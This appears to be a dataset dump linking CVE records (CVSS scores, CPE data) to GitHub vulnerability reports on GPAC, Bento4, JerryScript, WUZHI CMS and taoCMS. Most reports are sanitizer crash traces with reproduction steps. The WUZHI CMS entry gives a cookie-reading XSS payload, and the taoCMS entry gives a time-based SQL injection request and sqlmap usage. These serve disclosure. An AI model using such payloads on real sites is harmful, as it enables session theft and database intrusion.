cve_id
stringlengths
13
16
cve_published
stringlengths
23
23
cve_descriptions
stringlengths
48
2.08k
cve_metrics
dict
cve_references
listlengths
1
138
cve_configurations
listlengths
1
39
url
stringlengths
37
77
cve_tags
sequencelengths
1
4
domain
stringclasses
1 value
issue_owner_repo
sequencelengths
2
2
issue_body
stringlengths
0
88.6k
issue_title
stringlengths
3
335
issue_comments_url
stringlengths
56
81
issue_comments_count
int64
0
146
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
37
62
issue_github_id
int64
104M
2.09B
issue_number
int64
1
122k
CVE-2021-40609
2022-06-28T13:15:09.880
The GetHintFormat function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1894" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1894
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). It's a heap-buffer-overflow bug Step to reproduce: 1.get latest commit code (GPAC version 1.1.0-DEV-rev1170-g592ba26-master) 2.compile with --enable-sanitizer 3.run ./MP4BOX info poc Env: Ubunut 20.04 , clang 12.0.1 ASAN report ``` ==2275020==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000638 at pc 0x7f1c17ca68a4 bp 0x7ffd52eab1d0 sp 0x7ffd52eab1c8 READ of size 4 at 0x604000000638 thread T0 #0 0x7f1c17ca68a3 in GetHintFormat /home/lly/pro/gpac_public/src/isomedia/hint_track.c:46:22 #1 0x7f1c17ca68a3 in CheckHintFormat /home/lly/pro/gpac_public/src/isomedia/hint_track.c:58:6 #2 0x7f1c17ca68a3 in gf_isom_get_payt_count /home/lly/pro/gpac_public/src/isomedia/hint_track.c:979:7 #3 0x5b52e5 in DumpTrackInfo /home/lly/pro/gpac_public/applications/mp4box/filedump.c:3178:14 #4 0x5e4af1 in DumpMovieInfo /home/lly/pro/gpac_public/applications/mp4box/filedump.c:3789:3 #5 0x52ea16 in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:6023:9 #6 0x7f1c15d710b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x429aad in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x429aad) 0x604000000638 is located 0 bytes to the right of 40-byte region [0x604000000610,0x604000000638) allocated by thread T0 here: #0 0x4a496d in malloc (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4a496d) #1 0x7f1c17543a17 in nmhd_box_new /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:4651:2 #2 0x7f1c1775de4f in gf_isom_box_new_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1673:6 #3 0x7f1c17756209 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:239:12 #4 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7 #5 0x7f1c1751e43a in minf_box_read /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:3527:6 #6 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9 #7 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14 #8 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7 #9 0x7f1c17511b3d in mdia_box_read /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:3078:6 #10 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9 #11 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14 #12 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7 #13 0x7f1c17582c10 in trak_box_read /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:6734:6 #14 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9 #15 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14 #16 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7 #17 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9 #18 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14 #19 0x7f1c177548b9 in gf_isom_parse_root_box /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:38:8 #20 0x7f1c177e2347 in gf_isom_parse_movie_boxes_internal /home/lly/pro/gpac_public/src/isomedia/isom_intern.c:320:7 #21 0x7f1c177e2347 in gf_isom_parse_movie_boxes /home/lly/pro/gpac_public/src/isomedia/isom_intern.c:781:6 #22 0x7f1c177f84d3 in gf_isom_open_file /home/lly/pro/gpac_public/src/isomedia/isom_intern.c:901:19 #23 0x53c4b8 in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:5841:12 #24 0x7f1c15d710b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lly/pro/gpac_public/src/isomedia/hint_track.c:46:22 in GetHintFormat Shadow bytes around the buggy address: 0x0c087fff8070: fa fa 00 00 00 00 04 fa fa fa 00 00 00 00 00 00 0x0c087fff8080: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8090: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff80a0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff80b0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 =>0x0c087fff80c0: fa fa 00 00 00 00 00[fa]fa fa 00 00 00 00 00 00 0x0c087fff80d0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff80e0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa 0x0c087fff80f0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff8100: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff8110: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ``` [poc.zip](https://github.com/gpac/gpac/files/7051614/poc.zip)
heap-buffer-overflow in MP4BOX at souce file src/isomedia/hint_track.c:46
https://api.github.com/repos/gpac/gpac/issues/1894/comments
0
2021-08-26T04:44:12Z
2021-08-30T15:33:44Z
https://github.com/gpac/gpac/issues/1894
979,828,664
1,894
CVE-2021-40943
2022-06-28T13:15:09.920
In Bento4 1.6.0-638, there is a null pointer reference in the function AP4_DescriptorListInspector::Action function in Ap4Descriptor.h:124 , as demonstrated by GPAC. This can cause a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/643" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-638:*:*:*:*:*:*:*", "matchCriteriaId": "2122DA5E-A523-4D07-B017-982DF2B8B829", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/643
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
How to reproduce: ``` 1.check out latest code, 5922ba762a 2.compile with asan, set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address -g") set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") 3.run ./mp4dump --verbosity 3 --format text poc ``` You can see the asan information below: ``` ================================================================= ==633802==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000003c3e48 bp 0x7ffcbc9d4550 sp 0x7ffcbc9d4470 T0) ==633802==The signal is caused by a READ memory access. ==633802==Hint: address points to the zero page. #0 0x3c3e48 in AP4_DescriptorListInspector::Action(AP4_Descriptor*) const /home/lly/pro/Bento4/Source/C++/Core/Ap4Descriptor.h:124:21 #1 0x40bdc2 in AP4_List<AP4_Descriptor>::Apply(AP4_List<AP4_Descriptor>::Item::Operator const&) const /home/lly/pro/Bento4/Source/C++/Core/Ap4List.h:353:12 #2 0x40bdc2 in AP4_InitialObjectDescriptor::Inspect(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:327:22 #3 0x3e0485 in AP4_IodsAtom::InspectFields(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4IodsAtom.cpp:112:29 #4 0x37117e in AP4_Atom::Inspect(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4Atom.cpp:263:5 #5 0x39f0a2 in AP4_AtomListInspector::Action(AP4_Atom*) const /home/lly/pro/Bento4/Source/C++/Core/Ap4Atom.h:601:15 #6 0x39d3b1 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/lly/pro/Bento4/Source/C++/Core/Ap4List.h:353:12 #7 0x39d3b1 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220:16 #8 0x37117e in AP4_Atom::Inspect(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4Atom.cpp:263:5 #9 0x359b43 in main /home/lly/pro/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:350:15 #10 0x7f899655d0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x2a2b1d in _start (/home/lly/pro/Bento4/cmakebuild/mp4dump+0x2a2b1d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/lly/pro/Bento4/Source/C++/Core/Ap4Descriptor.h:124:21 in AP4_DescriptorListInspector::Action(AP4_Descriptor*) const ==633802==ABORTING ``` [poc.zip](https://github.com/axiomatic-systems/Bento4/files/7043072/poc.zip)
Null pointer reference in Ap4Descriptor.h:124
https://api.github.com/repos/axiomatic-systems/Bento4/issues/643/comments
0
2021-08-25T02:00:03Z
2021-08-25T02:00:03Z
https://github.com/axiomatic-systems/Bento4/issues/643
978,627,371
643
CVE-2021-40944
2022-06-28T13:15:09.963
In GPAC MP4Box 1.1.0, there is a Null pointer reference in the function gf_filter_pid_get_packet function in src/filter_core/filter_pid.c:5394, as demonstrated by GPAC. This can cause a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1906" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "13133329-701B-4D4B-BA02-F2DF80638668", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1906
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...) Step to reproduce: ``` 1.get latest commit code (GPAC version 1.1.0-DEV-rev1170-g592ba2689-master) 2.compile with --enable-sanitizer 3.run ./gpac nhmlr:reframe=1:gpac:index=1.0:gpac:src= ``` **Im not sure if it's a correct usage of "nhmlr filter" , or by which way could i parse nhml file?** Env: Ubunut 20.04 , clang 12.0.1 ASAN report ``` ==2311904==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fa16d0fb321 bp 0x7fff730acdb0 sp 0x7fff730acc20 T0) ==2311904==The signal is caused by a READ memory access. ==2311904==Hint: address points to the zero page. #0 0x7fa16d0fb321 in gf_filter_pid_get_packet /home/lly/pro/gpac_public/src/filter_core/filter_pid.c:5394:6 #1 0x7fa16d22468a in nhmldmx_process /home/lly/pro/gpac_public/src/filters/dmx_nhml.c:1320:8 #2 0x7fa16d15a431 in gf_filter_process_task /home/lly/pro/gpac_public/src/filter_core/filter.c:2441:7 #3 0x7fa16d13d2a7 in gf_fs_thread_proc /home/lly/pro/gpac_public/src/filter_core/filter_session.c:1640:3 #4 0x7fa16d13c850 in gf_fs_run /home/lly/pro/gpac_public/src/filter_core/filter_session.c:1877:2 #5 0x4d12ed in gpac_main /home/lly/pro/gpac_public/applications/gpac/main.c:2254:7 #6 0x7fa16c0210b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41fe0d in _start (/home/lly/pro/gpac_public/bin/gcc/gpac+0x41fe0d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/lly/pro/gpac_public/src/filter_core/filter_pid.c:5394:6 in gf_filter_pid_get_packet ```
Null pointer reference in GPAC at src/filter_core/filter_pid.c:5394
https://api.github.com/repos/gpac/gpac/issues/1906/comments
4
2021-09-01T07:25:03Z
2021-09-07T15:18:06Z
https://github.com/gpac/gpac/issues/1906
984,803,968
1,906
CVE-2020-19897
2022-06-28T22:15:07.810
A reflected Cross Site Scripting (XSS) in wuzhicms v4.1.0 allows remote attackers to execute arbitrary web script or HTML via the imgurl parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/183" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhi_cms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4749403-9C42-40DF-A695-A9E31BD37D84", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/wuzhicms/wuzhicms/issues/183
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
A xss vulnerability was discovered in WUZHI CMS 4.1.0 There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of /index.php?m=core&f=index&_su=wuzhicms. POC ji</textarea> <img/src=1 onerror=alert(document.cookie)> Vulnerability trigger point http://localhost/index.php?m=core&f=index&_su=wuzhicms. When attacker access -system settings - basic settings, Write poc in the statcode form , then XSS vulnerability is triggered successfully. 1、choose this part and write poc to [statcode] form ![image](https://user-images.githubusercontent.com/13130156/62277899-aa236680-b479-11e9-9135-0b0259ef3db2.png) 2、submit and view webpage ![image](https://user-images.githubusercontent.com/13130156/62277796-76484100-b479-11e9-97fa-42d8ce4c1607.png)
wuzhicms v4.1.0 statcode reflected xss vulnerability
https://api.github.com/repos/wuzhicms/wuzhicms/issues/183/comments
0
2019-08-01T08:29:05Z
2019-08-01T08:30:33Z
https://github.com/wuzhicms/wuzhicms/issues/183
475,546,565
183
CVE-2021-44915
2022-07-05T18:15:07.797
Taocms 3.0.2 was discovered to contain a blind SQL injection vulnerability via the function Edit category.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/taogogo/taocms/issues/8
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
Log in to the background as the default account admin. ![1](https://user-images.githubusercontent.com/47633517/144992861-6bbaa6ec-fe07-4641-9596-193c4fd9315c.png) We click in order and grab packets: ![2](https://user-images.githubusercontent.com/47633517/144993925-44418ab5-2601-47cb-8c81-5ee822c3fa9d.png) ![3](https://user-images.githubusercontent.com/47633517/144993935-3a8f5790-c77b-439e-a29a-1bf6d80cc23c.png) ![4](https://user-images.githubusercontent.com/47633517/144993941-34e87899-1eae-450e-b7f6-89c6e91ae663.png) There is a time-based blind SQL injection vulnerability in the location of id. ![5](https://user-images.githubusercontent.com/47633517/144994546-5f75af11-e54a-4e82-8cfd-efb35231e400.png) ![6](https://user-images.githubusercontent.com/47633517/144994554-51aa2e7c-63c4-4532-9f62-8225bdcd31ae.png) POC: http://192.168.102.129:82/admin/admin.php post:name=test&nickname=test&fid=&cattpl=&listtpl=&distpl=&intro=test&orders=0&status=1&action=category&id=3) AND (SELECT 8663 FROM (SELECT(SLEEP(10)))IUse) AND (6655=6655&ctrl=update&Submit=%E6%8F%90%E4%B sqlmap: Save the HTTP request package as a file . ![7](https://user-images.githubusercontent.com/47633517/144995527-671160c5-222f-4163-8d9a-658040c53d6f.png) Test using the SQLMap tool : ![8](https://user-images.githubusercontent.com/47633517/144995528-254db374-fd34-48f6-9a45-c9abe3f6f094.png)
There is SQL blind injection at "Edit category"(Column administrator authority)
https://api.github.com/repos/taogogo/taocms/issues/8/comments
0
2021-12-07T08:51:23Z
2021-12-07T08:51:23Z
https://github.com/taogogo/taocms/issues/8
1,073,082,158
8
CVE-2022-32117
2022-07-13T21:15:08.123
Jerryscript v2.4.0 was discovered to contain a stack buffer overflow via the function jerryx_print_unhandled_exception in /util/print.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5008" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/5008
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 0d4969661810b9e618485c284c361e597144e9b9 master ###### Build platform Ubuntu 16.04.7 LTS (Linux 4.15.0-142-generic x86_64) ###### Build steps ```sh ./tools/build.py --clean --compile-flag=-fsanitize=address --lto=off --error-message=on --profile=es.next --stack-limit=15 --debug --logging=on --line-info=on ``` ###### Test case ```javascript for (let __v1 = 0; __v1 < 10000; __v1++) { ['__v6', '__v2', '__v1', '__v3', '__v4', '__v5'];" __v5(__v1, } ``` ```sh ==112046==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda03d5390 at pc 0x7fa6aae1ea7d bp 0x7ffda03d5240 sp 0x7ffda03d49e8 READ of size 1 at 0x7ffda03d5390 thread T0 #0 0x7fa6aae1ea7c in __interceptor_strtol (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x75a7c) #1 0x581203 in jerryx_print_unhandled_exception /home/lily/Desktop/67/jerryscript/jerry-ext/util/print.c:247 #2 0x4027c1 in main /home/lily/Desktop/67/jerryscript/jerry-main/main-desktop.c:172 #3 0x7fa6aa6f683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #4 0x401e88 in _start (/home/lily/Desktop/67/jerry+0x401e88) Address 0x7ffda03d5390 is located in stack of thread T0 at offset 224 in frame #0 0x580e99 in jerryx_print_unhandled_exception /home/lily/Desktop/67/jerryscript/jerry-ext/util/print.c:204 This frame has 3 object(s): [32, 36) 'source_size' [96, 104) 'current_p' [160, 224) 'buffer_p' <== Memory access at offset 224 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 __interceptor_strtol Shadow bytes around the buggy address: 0x100034072a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072a50: 00 00 00 00 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 0x100034072a60: f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 00 00 00 00 00 =>0x100034072a70: 00 00[f3]f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 0x100034072a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==112046==ABORTING
Stack-buffer-overflow in jerryx_print_unhandled_exception (jerryscript/jerry-ext/util/print.c)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5008/comments
1
2022-05-29T18:17:00Z
